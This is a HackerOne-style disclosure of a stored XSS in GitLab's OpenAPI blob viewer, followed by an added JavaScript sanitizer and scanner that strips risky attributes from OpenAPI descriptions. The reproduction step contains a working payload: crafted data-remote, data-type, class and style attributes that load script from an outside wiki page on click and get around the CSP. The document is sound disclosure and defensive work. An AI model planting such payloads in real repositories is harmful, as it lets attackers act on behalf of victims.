
Stored XSS in blob viewer

HackerOne report #806571 by yvvdwf on 2020-02-27, assigned to @jeremymatos:

Summary

I found a stored XSS in the blob viewer when viewing a JSON file.

In particular, when viewing an OpenAPI file, openapi_viewer is called to pass the file's data to SwaggerUIBundle for rendering.

SwaggerUIBundle does its job when rendering a graphical representation of the OpenAPI content. It also allows HTML tags and attributes in the description of the OpenAPI document. Although it removes malicious tags and attributes, this is not enough in GitLab's context:

  1. The class and style attributes allow attackers to arbitrarily control the presentation of their content. My demo below uses the class attribute to create a transparent layer that covers the document to intercept any user's clicks.

  2. data-* attributes, with the help of jquery-ujs, allow attackers to create any request to the server when the user clicks (not only GET, but also PUT, DELETE, HEAD) with arbitrary parameters.

  3. The current CSP is easily bypassed by jQuery.globalEval. In my demo below, you should see an alert after clicking anywhere.

Steps to reproduce

  1. In any project, create a file named xss-openapi.json with the following content:

     {
       "swagger" : "2.0",
       "info" : {
         "description" : "<a href=https://gitlab.com/yvvdwf/data/-/wikis/alert.md data-type=script style='cursor:default' data-remote=true class='atwho-view select2-drop-mask pika-select'></a><script>alert(0)</script>"
       }
     }

  2. Click anywhere on the document view; you should see an alert.

Impact

There are three impacts, as described in the Summary above. The most important is the stored XSS, which allows attackers to perform any action on behalf of users on the client side.

Examples

(This repository is in private mode, please let me know if you cannot access it)
https://gitlab.com/yvvdwf/xss/-/blob/master/xss-openapi.json

What is the current bug behavior?

GitLab does not check the result generated by SwaggerUIBundle.

What is the expected correct behavior?

It should remove any inappropriate HTML attributes, such as data-*, style, and class.
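The attribute policy the expected behavior calls for, with the three attribute families from the Summary (class, style, data-*) treated as risky alongside on* handlers, as an added example that is not GitLab's or Swagger UI's code. It assumes allowlists chosen for this example and a deliberately simple regex tokenizer over tags; in a real deployment the rendered DOM should go through DOMPurify or an equivalent library carrying the same policy. The sample document is the report's own payload, constructed inline as a parsed object.

```javascript
// Added example, not GitLab's or Swagger UI's code: an allowlist filter for
// the HTML that may appear in OpenAPI "description" fields, plus a scanner
// that walks a parsed OpenAPI document and reports everything the filter
// would drop. The tokenizer is deliberately simple (regex over tags); a real
// deployment should run the rendered DOM through DOMPurify or an equivalent.

// Allowlists are assumptions for this example.
const ALLOWED_TAGS = new Set(['a', 'b', 'i', 'em', 'strong', 'code', 'p', 'br',
  'ul', 'ol', 'li', 'img']);
const ALLOWED_ATTRS = new Set(['href', 'src', 'title', 'alt']);
// Elements removed together with their content.
const DROP_WITH_CONTENT =
  /<\s*(script|style|iframe|object|embed)\b[^>]*>[\s\S]*?<\s*\/\s*\1\s*>/gi;
// Keys whose string values Swagger UI renders as Markdown/HTML (assumption:
// only "description" is checked here).
const HTML_BEARING_KEYS = new Set(['description']);

const TAG_RE = /<\s*(\/?)([a-zA-Z][\w:-]*)([^>]*?)(\/?)>/g;
const ATTR_RE = /([^\s=\/"'<>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;

// The report's point: these attributes are inert on their own but gain
// behaviour from the host page (jquery-ujs reads data-*, the app's CSS gives
// meaning to class, style positions the element, on* runs script).
function isRiskyAttr(name) {
  return name.startsWith('data-') || name.startsWith('on') ||
    name === 'style' || name === 'class';
}

// Only link targets that cannot run script are kept.
function isSafeUrl(value) {
  return /^(https?:|mailto:|\/|#)/i.test(value.trim());
}

function unquote(value) {
  return value.replace(/^["']|["']$/g, '');
}

// Returns the filtered HTML and a list of every tag/attribute removed.
function sanitizeDescription(html) {
  const dropped = [];
  let out = html.replace(DROP_WITH_CONTENT, (m, tag) => {
    dropped.push({ tag: tag.toLowerCase(), attr: null });
    return '';
  });
  out = out.replace(TAG_RE, (m, close, tag, attrs, selfClose) => {
    const t = tag.toLowerCase();
    if (!ALLOWED_TAGS.has(t)) {
      dropped.push({ tag: t, attr: null });
      return ''; // tag removed; its text content stays as plain text
    }
    if (close) return `</${t}>`;
    const kept = [];
    for (const am of attrs.matchAll(ATTR_RE)) {
      const name = am[1].toLowerCase();
      const value = am[2] === undefined ? '' : unquote(am[2]);
      if (isRiskyAttr(name) || !ALLOWED_ATTRS.has(name) ||
          ((name === 'href' || name === 'src') && !isSafeUrl(value))) {
        dropped.push({ tag: t, attr: name });
        continue;
      }
      kept.push(`${name}="${value.replace(/"/g, '&quot;')}"`);
    }
    const attrText = kept.length ? ' ' + kept.join(' ') : '';
    return `<${t}${attrText}${selfClose ? ' /' : ''}>`;
  });
  return { html: out, dropped };
}

// Walks a parsed OpenAPI document and reports, per JSON path, what the
// filter would strip. Usable as a pre-render check or a CI lint.
function scanOpenApi(doc, path = '$', findings = []) {
  if (Array.isArray(doc)) {
    doc.forEach((v, i) => scanOpenApi(v, `${path}[${i}]`, findings));
  } else if (doc && typeof doc === 'object') {
    for (const [k, v] of Object.entries(doc)) {
      const p = `${path}.${k}`;
      if (typeof v === 'string' && HTML_BEARING_KEYS.has(k)) {
        const { dropped } = sanitizeDescription(v);
        if (dropped.length) findings.push({ path: p, dropped });
      } else {
        scanOpenApi(v, p, findings);
      }
    }
  }
  return findings;
}

// Constructed sample: the payload from the report above, as a parsed object.
const SAMPLE_OPENAPI = {
  swagger: '2.0',
  info: {
    description: "<a href=https://gitlab.com/yvvdwf/data/-/wikis/alert.md " +
      "data-type=script style='cursor:default' data-remote=true " +
      "class='atwho-view select2-drop-mask pika-select'></a>" +
      '<script>alert(0)</script>',
  },
};

for (const f of scanOpenApi(SAMPLE_OPENAPI)) {
  const items = f.dropped.map(d => (d.attr ? `${d.tag}[${d.attr}]` : `<${d.tag}>`));
  console.log(`${f.path}: dropped ${items.join(', ')}`);
}
```

For the sample, the scan reports `$.info.description` with the script element and the data-type, style, data-remote and class attributes dropped, leaving only an anchor with its https href. Run as a CI lint over committed OpenAPI files, the same check rejects a description that depends on host-page classes or data-* attributes before it ever reaches the viewer.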

Output of checks

This bug happens on GitLab.com

Impact

The stored XSS allows attackers to perform any action on behalf of users on the client side.

Edited by Nick Thomas